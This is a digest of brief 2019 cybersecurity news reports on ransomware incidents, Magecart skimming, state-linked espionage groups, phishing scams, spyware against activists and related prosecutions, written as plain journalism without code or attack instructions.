A new investigation published by The Wall Street Journal claims that engineers from Chinese smartphone and networks hardware maker Huawei helped certain African governments spy on their political rivals' telecom networks. Specifically, the article's sources claim the company helped authorities in Uganda intercept encrypted messages and allowed police in Zambia to locate opposition bloggers. Huawei's alleged participation ranged from the provision of Israeli malware to tapping phones and illegally accessing political opponents' Facebook pages. Perhaps surprisingly, both governments readily confirmed that they are working with Huawei, but both framed their efforts as combating "fake news," rather than suppressing communications from sources with views that differ from their own.
Kaspersky Study Examines OT/ICS Incidents (08/21/2019)
Kaspersky Lab has published a new study in which it reported that 52 percent of OT/ICS (operational technology and industrial control system) networks incidents were due to "employee errors" or "unintentional actions." The State of Industrial Cybersecurity 2019 report found this issue to primarily be the result of the growing complexity of industrial infrastructure, as well as a general shortage of professionals who understand how to detect new threats.Ransomware Attack Impacts Two Texas Cities (08/22/2019)
The cities of Borger and Keene, Texas became two of the latest municipalities to fall victim to a ransomware attack, Sophos reported. In total, 22 departments within the two local governments were affected by the attack. Apparently the attackers demanded $2.5 million to restore the government's access to its systems. The state believes a single threat actor was the culprit for the entire incident, and that the attack was routed through a software provider used by all of the affected departments. The impacted cities were still in the process of attempting to recover their systems at the time of writing. No ransom was paid out.
Avast Teams Up with Law Enforcement to Halt Retadup Malware (08/28/2019)
Avast worked in conjunction with US and French authorities to neutralize 850,000 infections caused by the Retadup malware, which had been distributing a malicious cryptocurrency miner and other malware to computers running the Windows operating system, mostly in Latin America. While analyzing Retadup, Avast identified a design flaw in the file that would allow removal of the malware from victims' computers, with the takeover of the command and control (C&C) server. Retadup's C&C infrastructure was mostly located in France, so the team worked with French authorities to stop the threat. Some parts of the C&C infrastructure were also located in the United States, so French authorities included the FBI. The worm's malicious C&C server has been replaced with a disinfection server that has caused the connected pieces of malware to self-destruct.Critical Infrastructure Companies Preyed Upon by Hexane Threat Gang (08/28/2019)
A previously unknown threat entity targeted critical infrastructure organizations without being detected for more than 12 months, the security team at Secureworks advised. The threat group, which may have first become active in April 2018, targets organizations in sectors of strategic national importance, including oil and gas and possibly telecommunications. Its activity is similar to other groups, including OilRig and Elfin, but the researchers suspect this is a new entity entirely. This new group has been dubbed "Hexane" (also known as LYCEUM) and typically accesses an organization using account credentials obtained via password spraying or brute-force attacks. Using compromised accounts, the threat actors send spearphishing emails with malicious Excel attachments to deliver the DanBot malware, which subsequently deploys post-intrusion tools.FTC Reminds Consumers to Be Wary of Romance Scams (08/27/2019)
Consumers should be aware of romance scams that are finding their way into inboxes. The Federal Trade Commission has produced a video and issued an alert to help consumers avoid such scams.Heatstroke Campaign Implements Multi-Stage Phishing Attack (08/31/2019)
A campaign known as Heatstroke is using a multi-stage phishing attack to siphon private email addresses and eventually, payment credentials, the researchers at Trend Micro say. Heatstroke's multistage approach tries to mimic what a legitimate Web site would do to lull the potential victim into thinking nothing is amiss. The phishing kit's content is forwarded from another location, but masked to appear as if it was on the landing page itself. The researchers have learned that the phishing attack chain is dynamic, changing its routines depending upon the user's behavior.New IRS Scam Spotted in Consumer, Business Inboxes (08/27/2019)
The Internal Revenue Service (IRS) is warning taxpayers and tax professionals about an IRS impersonation scam campaign spreading nationally on email. The email subject line may vary, but examples use the phrase "Automatic Income Tax Reminder" or "Electronic Tax Return Reminder." The IRS reminds consumers that it never sends unsolicited emails and never emails taxpayers about the status of refunds.Over 80 Ecommerce Sites Compromised in Magecart Skimming Scheme (08/28/2019)
Over 80 Web sites using the Magento ecommerce platform have been compromised to send payment card data via formjacking to servers under the control of the Magecart gang. Information gleaned by Arxan Technologies and the Aite Group found that 25% of the compromised sites were motorsports or luxury retail brands. Many of the sites were using older versions of Magento that were known to have vulnerabilities.Report: US Launched Cyber Attack on Iranian Databased Used to Target Oil Tankers (09/01/2019)
A US cyber attack on a database belonging to Iran's Islamic Revolutionary Guard Corps prevented the Iranian paramilitary from launching attacks on oil tankers in the Gulf region, the New York Times (NY Times) has learned. According to unnamed US officials, the June 20 attack knocked systems offline and Iran was still attempting to recover data and reestablish its military communications. The attacked database was used to determine which oil tankers to target.Satori Botnet Operator Pleads Guilty to Hacking (09/04/2019)
Kenneth Currin Schuchman pled guilty to a hacking charge for operating the Satori botnet, which exploited vulnerabilities across 100,000 Internet of Things (IoT) devices, KrebsOnSecurity reported. Schuchman, a Vancouver, WA resident who used the online monikers "Nexus" and "Nexus-Zeta," built the botnet with at least two other individuals with leaked code from the Mirai botnet and used Satori in large-scale distributed denial-of-service attacks between July 2017 and October 2018. The botnet exploited vulnerabilities in routers, digital video recorders, and other IoT devices. Schuchman is facing up to 10 years in prison and fines up to $250,000 USD.TA505 Adopts New Tactics to Infiltrate New Areas (08/27/2019)
While the TA505 threat actor continues to use either the FlawedAmmyy remote access Trojan or the ServHelper malware as payloads, the entity has begun using .ISO image attachments as the point of entry; as well as a .NET downloader, a new style for macro delivery; a newer version of ServHelper; and a .DLL variant of FlawedAmmyy downloader. Trend Micro's research team has also observed TA505 targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.Twitter CEO's Account Hacked to Send Out Nasty Tweets (08/31/2019)
A hacker took control of the Twitter account for the social media platform's CEO Jack Dorsey, using it to send offensive tweets. Some of the tweets used the hashtag #ChucklingSquad, which is thought to be the name of the hacking group responsible. Once hijacked, the @jack account spewed messages containing racial epithets and a retweet of a message in support of the Nazis, the AFP reported. Twitter said via tweet that Dorsey's account was "compromised due to a security oversight by the mobile provider" and had been secured. The messages were viewable for about a half hour.US Mobile Users Targeted in Trickbot Campaign (08/31/2019)
The Gold Blackburn threat group is using Web injects from the Trickbot malware to take aim at Verizon Wireless, T-Mobile, and Sprint. When a victim navigates to the Web site of one of these organizations, the legitimate server response is intercepted by Trickbot and proxied through a command and control (C2) server. This C2 server injects additional HTML and JavaScript into the page, which is then rendered in the victim's Web browser. For all three carriers, injected code causes an additional form field that requests the user's PIN code. SecureWorks provided a write-up of this activity.
Compromised Devices Abused in Campaign to Attack Web Servers (09/09/2019)
Trend Micro detected a spam campaign that uses compromised devices to attack vulnerable Web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to Web servers. The script sends an email with an embedded link to a scam site to specific email addresses. Some of the samples observed were used for spamming, for redirecting victims to cryptocurrency scams, and for spreading malware to vulnerable servers. The campaign has been seen targeting users in the UK.Massive DDoS Attack Hits Wikipedia and Lasts for Days (09/11/2019)
Wikipedia was slammed by a massive cyber attack that began on September 6 and lasted nearly three days. Security mitigation company ThousandEyes was monitoring Wikipedia and recorded a "significant drop in HTTP server availability" worldwide and site access was lost in Europe, the Middle East, and Africa. It is not known how large the attack was but information from ThousandEyes shows that it was a standard distributed denial-of-service attack resulting in massive traffic floods. The Wikimedia Foundation, the parent company of Wikipedia, condemned the attacks.Oklahoma Law Enforcement Retirement System Cyber Attack Siphons $4.2 Million (09/09/2019)
A cyber attack targeting the Web site for the Oklahoma Law Enforcement Retirement System (OLERS) resulted in the theft of $4.2 million USD. The crime is being actively investigated by the FBI but a statement posted to the OLERS site said, "no pension benefits to members or beneficiaries have been impacted or put at risk. All benefits will continue to be paid in a timely fashion as always." OLERS administers retirement and medical benefits to Oklahoma law enforcement.Ransomware Attacks on the Rise, Take Precautions to Avoid Impacts (09/09/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) has observed an increase in ransomware attacks across the nation. The organization released a document to provide details about ransomware, steps to take to prevent such attacks from occurring, and ways to recover if such incidents impact systems.Report: US Grid Hit by March Cyber Attack Following Exploit of Firewall (09/10/2019)
A known vulnerability exploited in a firewall used at an unnamed power utility in the western US resulted in communications outages after an attacker launched a denial-of-service attack at a low-impact control center and multiple remote low-impact generation sites. This information comes from E&E News, which obtained a copy of a Lesson Learned Report from the North American Electric Reliability Corporation (NERC). According to E&E News, the incident occurred on March 5 and impacted California, Wyoming, and Utah. The incident was brief, lasting less than five minutes, and firewall reboots occurred over a 10-hour period with each firewall being offline for less than five minutes. The report stated, " Given that a firmware update to address the exploited vulnerability had been released prior to the event, the entity's process for assessing and implementing firmware updates was reviewed. Based on this review, the entity decided to implement a more formal and more frequent review of vendor firmware updates that would be tracked within internal compliance tracking software. It should be noted that the entity was already working to develop internal procedures to support this process; however, these were not completed or being practiced at the time of the event." .Thrip Threat Group Continues Targeted Attacks in Southeast Asia with Sophisticated Tools (09/09/2019)
Symantec has linked two threat groups and now believes they are one and the same. Thrip, a Chinese espionage group, is using a previously unseen backdoor known as Hannotog and another backdoor known as Sagerunex. Analysis of Sagerunex shows close links to another long-established espionage group called Billbug (aka Lotus Blossom) and it is likely the two entities are the same. Since June 2018, Thrip has attacked at least 12 organization within Southeast Asia, including those in the military, maritime communications, education, and media sectors. The Hannotog backdoor has been in use since at least January 2017 and provides the attackers with a persistent presence on the victim's network. Sagerunex delivers remote access to the attackers.Trend Micro Investigates What Miscreants Really Talk About in the Dark Underground (09/10/2019)
A post from Trend Micro assesses what information individual cybercrime underground communities discuss in relation to threats and attacks. The Russian underground holds the most discussions on Internet of Things-related attacks while monetization is the main focus of this community. The Portuguese cybercriminal community is the second most active group and many members have discussed KL DNS, a redirection service that allows phishers to capture banking information from infected routers. Individuals in the English-speaking cybercriminal community are most interested in exploiting vulnerabilities, discussing exploit codes, and abusing connected printers.
Facebook Removes Content Associated with Inauthentic Behavior (09/19/2019)
Facebook removed multiple pages, groups, and accounts that were involved in coordinated inauthentic behavior, including two, unrelated operations that originated in Iraq and Ukraine. According to the report, six accounts, 120 Facebook Pages, one Group, two Events, and seven Instagram accounts were pulled down for engaging in domestic-focused coordinated inauthentic behavior in Iraq. In regards to Ukraine, Facebook removed 168 accounts, 149 Facebook Pages and 79 Groups for similar behavior. Facebook said in a statement, "We're taking down these Pages, Groups and accounts based on their behavior, not the content they posted. In each of these cases, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves..."Huge DDoS Attack Seen in the Wild Targeting Gaming Company (09/18/2019)
A massive distributed denial-of-service (DDoS) attack hit a company in the gaming industry and peaked at 35 Gbps in bandwidth, Akamai reported. According to the vendor, this is the fourth largest DDoS attack it has ever encountered and the attack used a UDP Amplification technique known as WS-Discovery (Web Services Dynamic Discovery). WS-Discovery is a highly exploitable technique developed to ease consumer device network discovery and connectivity.Panda Threat Entity Uses RATs, Cryptominers in Thievery Activities (09/17/2019)
A threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools and illicit cryptomining malware. Analysis conducted by Cisco shows that Panda uses exploits previously utilized by the Shadow Brokers, a group that published information from the National Security Agency (NSA), and Mimikatz, an open-source credential-dumping program. Panda began employing new command and control and payload-hosting infrastructures around mid-August.Teen Gamer Receives 15 Months in Prison for Fatal Swatting Incident (09/16/2019)
An Ohio gamer involved in a swatting incident that led to a death was sentenced to 15 months in prison, the Department of Justice (DOJ) announced. Nineteen-year-old Casey Viner pleaded guilty to one count of conspiracy and one count of obstructing justice. In his plea, Viner admitted he argued with co-defendant Shane Gaskill while playing Call of Duty World War II online. Viner contacted co-defendant Tyler Barriss and asked him to swat Gaskill. Viner, however, gave Barriss an incorrect address. Barriss then called police and reported a hostage situation at the address given to him. Law enforcement responded to the hoax call and shot and killed Andrew Finch, an innocent man. Barriss is serving a 20-year prison term. The incident took place in December 2017.Tortoiseshell Threat Group Takes Aim at Saudi Supply Chain (09/18/2019)
A previously undocumented attack group dubbed "Tortoiseshell" is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers' customers. Tortoiseshell has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.Treasury Department Imposes Sanctions on North Korean Hacking Groups (09/16/2019)
The Treasury Department's Office of Foreign Assets Control announced sanctions targeting three state-sponsored malicious cyber groups responsible for North Korea's malicious cyber activity on critical infrastructure. The department said that the Lazarus Group, Bluenoroff, and Andariel were responsible for cyber attacks on critical infrastructure and financial institutions and the 2018 WannaCry hack on the National Health Service in the UK. Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence, said, "Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs."
Latest Sednit/Fancy Bear/Sofacy Activities Show Sophisticated New Components (09/24/2019)
A Sednit (also known as APT28, Fancy Bear, Sofacy, and STRONTIUM) campaign launched on August 20 to take aim at embassies and ministers of foreign affairs in Eastern European and Central Asian countries, ESET's scientists learned. The campaign, which has been previously illustrated by the security team at Telsy TRT, started with a phishing email containing a malicious attachment that delivered a long chain of downloaders, ending with a backdoor. ESET discovered that Sednit added the Nim language to its toolset for use in its downloader, updated its Golang download malware, and rewrote its backdoor from Delphi into Golang.Report: Airbus Targeted by Hackers for Commercial Secrets (09/26/2019)
Threat actors launched cyber attacks on the European aerospace company Airbus, unnamed sources told AFP. There have been four attacks which began in 2018 and continued into 2019. The sources said that Rolls-Royce, French technology consultancy Expleo, and two French contractors working for Airbus were the targets. Several of the unnamed individuals said that the attackers appeared to be looking for technical documentation that links to the certification process for Airbus aircraft components. The hackers also stole documents related to the turbo prop engines used in Airbus military planes and details on the propulsion systems and avionics systems for the Airbus A350 passenger plane. Although it is not clear which threat entity is behind these attacks, the sources pointed to Chinese hackers. Airbus did not respond to the report. Rolls-Royce would not comment on specifics of any attack and Expleo refused to confirm or deny the events.Russian Hacker Pleads Guilty in JPMorgan Breach Case Involving 100 Million People (09/24/2019)
Andrei Tyurin, the Russian man responsible for infiltrating the data for more than 100 million individuals via a massive hacking campaign that hit JPMorgan Chase, has pled guilty to six counts, including computer hacking conspiracy and bank fraud, the Department of Justice (DOJ) announced. The scheme took place between 2012 and 2013 and compromised the data for over 100 million financial customers, including 83 million from JPMorgan Chase. Charges against three other individuals involved in this hack are pending.Scammers Use Voicemail Messages to Trick Corporate Microsoft User Accounts (09/26/2019)
Kaspersky has uncovered a widespread malicious email campaign aimed at stealing Microsoft user account credentials allowing attackers to access private, corporate information. Executed via an elaborate spam message, these attacks target employees working for large organizations that use business messengers with a function to exchange voice messages and receive voice message notifications through corporate emails. The attack is aimed specifically at corporate mail users and its purpose is to access important business correspondence and confidential commercial data.Senior Members of Tibetan Groups Attacked by POISON CARP Threat Entity (09/25/2019)
A campaign known as POISON CARP is to blame for attacks on senior members of Tibetan groups. These individuals, as revealed by the Citizen Lab team, received malicious links in individually tailored WhatsApp text exchanges with operators posing as non-governmental organization workers, journalists, and other fake personas. The links led to code designed to exploit Web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. The attacks took place between November 2018 and May. POISON CARP employed a total of eight Android browser exploits, an Android spyware kit, one iOS exploit chain, and iOS spyware.Tortoiseshell Threat Actor Victimizes Job-Seeking US Veterans (09/25/2019)
US military veterans are being targeted by the Tortoiseshell threat actor via a fake Web site, Cisco has confirmed. The threat group deployed a Web site designed to help US military vets find job and the site looked close to a legitimate service offered by the Department of Commerce. The site prompted users to download an app, which was actually a malicious downloader, deploying spying tools and other malware, including a remote access Trojan called IvizTech.Windows Users Exploited by PcShare Backdoor Attacks (09/25/2019)
A suspected Chinese advanced persistent threat group is conducting attacks against technology companies located in Southeast Asia. The threat actors deployed a modified version of the Chinese open-source backdoor called PcShare, which is designed to operate when side-loaded by a legitimate NVIDIA application. According to BlackBerry Cylance, the attackers also deploy a Trojanized screen reader application, replacing the built-in Narrator "Ease of Access" feature in Windows. This backdoor allows them to surreptitiously control systems via remote desktop logon screens without the need for credentials.xHunt Threat Activity Takes Aim at Kuwaiti Transportation Sector (09/24/2019)
Between May and June, Palo Alto Networks observed previously unknown malicious tools used in the targeting of transportation and shipping organizations based in Kuwait. The activity has been dubbed "xHunt" because the threat actor named the tools after character names from the anime series Hunter x Hunter. These tools use HTTP for their command and control (C2) channels and certain variants use DNS tunneling or emails to communicate with the C2 as well. It is likely that this campaign is related to a similar one documented by IBM in 2018.
Google Play Apps Found Harboring Malware to Spy on Egyptian Journalists and Activists (10/03/2019)
Check Point Software studied a targeted attack against journalists and human rights activists in Egypt that had been previously reported on by Amnesty International in March. According to the Check Point team, unknown or previously undisclosed malicious artifacts belonging to this operation were uncovered. The attackers began developing mobile applications to monitor their targets and hosted them on Google Play. Upon notification, Google removed the malicious apps. The attacks have been ongoing since at least 2018 and many of the victims are political and social activists, high-profile journalists, and members of non-profit organizations in Egypt.MasterMana Campaign Uses Various Criminal Tactics to Steal Money, Remain Hidden (10/03/2019)
Prevailion has uncovered new details concerning the MasterMana Botnet, which uses business email compromise schemes and backdoors to pilfer cryptocurrency wallets and has been in operation since at least December 2018. This campaign is attributed to the Gorgon Group, a well-known threat and intelligence entity. The operation's phishing emails revealed infected document attachments. Opening the infected document initiated the attack's multi-pronged, labyrinth-like kill-chain which aids in detection evasion by relying upon trust placed third-party Web sites and services, such as Bitly, Blogspot, and Pastebin. The threat actors also modified older Pastebin posts to cease execution and added features to avoid sandboxing. Ultimately, the victim would download a .NET dll that would perform process hollowing and load a fileless backdoor, either a variant of the Azorult malware or the Revenge remote access Trojan.
Attor Platform Spies on Russian Speakers as It Hides Behind Tor (10/10/2019)
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis. Attor's GSM (Global System for Mobile Communications) plugin uses the AT command protocol and then uses Tor for its network communications for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor is primarily targeting Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.FIN7 Adds Dangerous New Tools to Threat Arsenal (10/10/2019)
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.Magecart Compromises Ecommerce Cloud Platform, Injects Credit Card Skimmers (10/10/2019)
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library provided by Volusion to its client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.Magecart Threat Group Tied to Cobalt Cyber Attackers (10/07/2019)
RiskIQ has warned that the Magecart group is becoming a serious threat, as the entity's skimmers have appeared over two million times and breached over 18,000 hosts. Magecart's average breach length is 22 days and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in email addresses that were used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.Moroccan Human Rights Activists Targeted by NSO Group Spyware (10/10/2019)
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israeli-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that if clicked would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.US Businesses, Consumers Threatened by Targeted Ransomware Attacks (10/07/2019)
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their activities more effective.
China Hacked Aviation Companies to Get Intel to Build C919 Airplane (10/14/2019)
Chinese hackers coordinated a multi-year campaign to obtain information on the components used in the Comac C919 aircraft, which cost less than its competitors and made its maiden flight in 2017, following years of delays due to design flaws. CrowdStrike released a report that the Chinese state-aligned adversary TURBINE PANDA conducted cyber intrusions from roughly 2010 to 2015 against several of the companies that make the C919's various components. The goal was to obtain all the intelligence needed to manufacture the C919 components in China. The campaign included two parts: actual hacking and recruiting employees who worked at the targeted aviation companies. Among those targeted and compromised were Safran Group, Honeywell, and GE. According to the analysis, "Beijing uses a multifaceted system of forced technology transfer, joint ventures, physical theft of intellectual property from insiders, and cyber-enabled espionage to acquire the information it needs."Hacker Arraigned in Cryptocurrency Scheme that Netted $1.4 Million (10/14/2019)
Alleged hacker Anthony Tyler Nashatka was arraigned in federal court on charges of conspiracy to commit computer fraud and abuse, conspiracy to commit wire fraud, aggravated identity theft and other charges related to a scheme to defraud victims of at least $1.4 million USD in cryptocurrency in December of 2017, the Department of Justice (DOJ) announced. According to an indictment, Nashatka conspired to target a cryptocurrency exchange platform to obtain the private keys and other information of hundreds of its users as part of a scheme to steal the users' cryptocurrency. The indictment further describes how the defendants unlawfully used the identity of a victim to gain access to the platform's domain name settings, caused the transmission of a command to disable all of the cryptocurrency company's servers, diverted users from the actual platform to a fake website, and fraudulently induced victims to input their cryptocurrency addresses and private keys into the fake Web site.Imperva Breach Blamed on Leaky Cloud Configuration (10/14/2019)
Imperva admitted that a misconfiguration is to blame for a security breach affecting "a subset" of its Cloud Web Application Firewall (WAF) customers. "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords. Kunal Anand, Imperva's chief technology officer, said, "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS (Amazon Web Services) accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords." The breach was discovered in August and the incident is not related to a vulnerability in the Cloud WAF product.Kaspersky Honeypots Detected 105 Million IoT Device Attacks in First Half of 2019 (10/15/2019)
Kaspersky honeypots detected 105 million attacks on Internet of Things (IoT) devices coming from 276,000 unique IP addresses in the first six months of 2019, a figure nearly nine times greater than the number found in the same period of 2018. The findings come from Kaspersky's IoT: A Malware Story report on honeypot activity in H1 2019. The report found that attacks on IoT devices are generally not sophisticated but are stealthy, leaving users unaware that their devices are being exploited. The Mirai malware was used in 39% of the attacks while Nyadrop was seen in 38.57% of attacks.Pitney Bowes Services Impacted by Cyber Attack (10/15/2019)
A ransomware attack hit Pitney Bowes, resulting in encrypted information and disrupted access for clients, the shipping services company said in a statement. "We have seen no evidence that customer accounts or data have been impacted," the company said. Customers will not be able to refill postage meters but can print postage if they have funds loaded in the system. Mailing system products and Your Account access are impacted by this attack.TA407 Threat Group Goes Phishing at Universities (10/14/2019)
Investigation into the TA407 (also known as Silent Librarian, Cobalt Dickens, and Mabna Institute) threat actor shows that its targeting phishing attacks at specific universities in North America and Europe. TA407 uses well-crafted social engineering mechanisms including: stolen university branding, fake email signatures/credentials/addresses, university-specific email bodies/portal clones, and themed subject lines. Proofpoint noted that TA407 takes advantage of publicized downtime and weather alerts, among other events, to add credibility to the phish.Under the Radar: For 4 Years, the Dukes Used New Malware Tools for Cyber Espionatge (10/17/2019)
The Dukes (also known as APT29 and Cozy Bear) threat group appeared to take a hiatus but the entity has reemerged with new malware implants in ongoing activities that ESET has dubbed "Operation Ghost." This campaign, which appears to have become active in 2013 and is ongoing, is using three malware implants - PolyglotDuke, RegDuke, and FatDuke - and has compromised the ministries of foreign affairs in at least three European countries. At least one European country's embassy in Washington, DC has also been affected. In Operation Ghost, the Dukes have used a limited number of tools but have utilized persistence, a four-stage, sophisticated malware platform, and have avoided communicating with the same command and control infrastructure between different victims.Winnti Group Updates Threat Arsenal with Additional Malware (10/14/2019)
ESET published details regarding new Winnti Group activities, including that the threat entity uses a packer called PortReuse to target specific organizations. The Winnti Group, which was responsible for the ShadowHammer supply chain attacks, also utilizes a VMProtected packer that decrypts position-independent code using RC5, with a key based on a static string and the volume serial number of the victim's hard drive, and runs it directly. The group uses the ShadowPad malware and a custom version of the XMRig crytptocurrency miner as payloads
Dots for Magecart Threat Group Connected to Carbanak Gang (10/23/2019)
Scientists at Malwarebytes have connected the Carbanak threat gang to the Magecart Group 5 cybercriminal group and Dridex phishing campaigns. Magecart is a group of affiliates who use malicious JavaScript to steal payment data from shoppers, mostly on checkout pages. Magecart Group 5 targets the supply chain used by online merchants. While analyzing Magecart Group 5's domains, Malwarebytes noticed several that connected to Dridex phishing campaigns. Dridex, a well-known banking Trojan, has often been used as an initial infection vector in attacks that deliver the Carbanak malware as the payload. The Carbanak gang use the malware of the same name.FTC Takes Action Against Spying Apps (10/23/2019)
The Federal Trade Commission (FTC) has barred the developers of three stalking apps from selling apps that monitor consumers' mobile devices unless they take certain steps to ensure the apps will only be used for legitimate purposes. The FTC alleges that Retina-X and its owner, James N. Johns, Jr., developed three mobile device apps that allowed purchasers to monitor the mobile devices on which they were installed, without the knowledge or permission of the device's user. The apps - known as MobileSpy, PhoneSheriff, and TeenShield - allowed purchasers to access sensitive information about device users, including the user's physical movements and online activities. At the same time, devices on which the apps were installed were exposed to security vulnerabilities.Ransomware Attack Knocks Billtrust Offline (10/22/2019)
An October 17 malware attack on financial services provider Billtrust resulted in an outage of the company's services, Bleeping Computer reported. Although the company did not publicly acknowledge the attack, customer Wittichen Supply announced that it had been notified by Billtrust of the malware incident. According to Wittichen Supply, no customer data was impacted and services were in the process of being restored from backups. An anonymous source told Bleeping Computer that Billtrust was affected by the BitPaymer ransomware.Russian Turla Group Stole Malicious Iranian Tools and Infrastructure (10/21/2019)
The National Security Agency (NSA) and the UK's National Cyber Security Center (NCSC) released a joint advisory on the Turla (also known as Waterbug and Venomous Bear) advanced persistent threat group that is widely thought to be associated with Russia. Previous advisories from the NCSC detailed Turla's use of Neuron and Nautilus implants and an ASPX-based backdoor alongside the Snake rootkit. Since those advisories were published, the NCSC, NSA, and partner-shared analysis of additional victims and infrastructure determined the Neuron and Nautilus tools were very likely Iranian in origin. Those behind Neuron or Nautilus were almost certainly not aware of, or complicit with, Turla's use of their implants. After acquiring the tools and the data needed to use them operationally, Turla first tested them against victims they had already compromised using their Snake toolkit, and then deployed the Iranian tools directly to additional victims.Texas Man Receives 12+ Years in Prison for Phishing LA Superior Court (10/24/2019)
A Texas man who was found guilty of hacking into the Los Angeles Superior Court (LASC) computer system, using the system to send approximately two million malicious phishing emails, and fraudulently obtaining hundreds of credit card numbers was sentenced to 145 months in federal prison. The Department of Justice (DOJ) announced that Oriyomi Sadiq Aloba and his co-conspirators targeted the LASC for a phishing attack. During the attack, the email account of one court employee was compromised and used to send phishing emails to coworkers purporting to be from the file-hosting service Dropbox. The email contained a link to a bogus Web site that asked for the users' LASC email addresses and passwords. Thousands of court employees received the Dropbox email, and hundreds disclosed their email credentials to the attacker. The compromised email accounts then were used to send millions of phishing emails.
Anti-Doping, Sporting Organizations Attacked by Strontium/Fancy Bear (10/29/2019)
Microsoft tracked new attacks linked to the Strontium (also known as Sofacy, Fancy Bear, and APT28) threat entity that focused on anti-doping authorities and sporting organizations around the world. At least 16 national and international sporting and anti-doping organizations across three continents were targeted in these attacks which began September 16. The methods used in the attacks are similar to the those previously used by Strontium: spear phishing, password spray, exploiting Internet-connected devices, and the use of both open-source and custom malware.Massive Data Dump of Indian Bank Cards Discovered in Joker's Stash (10/29/2019)
Group-IB uncovered a database holding more than 1.3 million credit and debit card records of mostly Indian banks' customers that was uploaded to Joker's Stash on October 28. The underground market value of the database is estimated at more than $130 million USD. Joker's Stash is an underground credit card shop. This particular dump, in which 98% of the cards belong to Indian banks, can be used to produce cloned cards for further cashouts.Ongoing Phishing Attack Targeting UN and Humanitarian Organizations (10/29/2019)
Lookout has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but the attack is still ongoing. The infrastructure connected to this attack has been live since March. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign, which is using keylogging and a mobile-aware functionality.Researchers Dive into Hacking Forum to Learn More about Rig EK (10/29/2019)
While researching a malware sample spread by the Rig exploit kit (EK), the researchers at Check Point Software were led to the HackForums underground market where they learned about the hacking community and the EK itself in some detail. The scientists discovered that a new hacker can easily start up a business after joining an underground forum and buying different cyber attack products. Additionally, Rig EK miscreants are actively reselling the exploitation service to different customers on different "flows" and providing them with a Rig public statistics link. This allows customers to re-resell this service to their own customers and distribute whatever variant they have.Steam Gamers Victimized by Fake, Yet Legitimate Looking Online Stores (10/29/2019)
A phishing scam targeting users of the Steam online gaming platform has spiked since June, the researchers at Kaspersky say. Attackers lure users to sites that mimic or copy online stores linked to Steam that sell in-game items. The fake resources are high-quality, making it difficult to distinguish them from the real thing.
Discovered Server Stockpiled with Malicious Tools Used to Target Industrial Companies (11/05/2019)
Cisco's Talos researchers discovered a server hosting a large stockpile of malicious files. Analysis of these files shows that the attackers were able to obtain a deep level of access to victims' infrastructure, enabling Talos to identify several targets of these attacks, including one American manufacturing company. The server contained a number of malicious files, including the DopplePaymer ransomware, the TinyPOS credit card scraping malware, and loaders that execute code delivered from the command and control server. The attack targets have been notified. According to the analysis, the attacker appears to be targeting medium-sized companies in the industrial space.Threat Actors Use Political Likenesses, Names for Malicious Gain (11/06/2019)
Cisco Talos discovered several malware distribution campaigns where the adversaries were utilizing the names and likenesses of prominent political figures, including President Trump, Hillary Clinton, and Vladimir Putin. Some of the applications are designed to coerce victims into paying ransom demands, while others could be used to gain backdoor access to systems and provide attackers the ability to operate within organizational networks.
DOJ Uncovers Major iPhone and iPad Fraud Scheme Operating in California (11/14/2019)
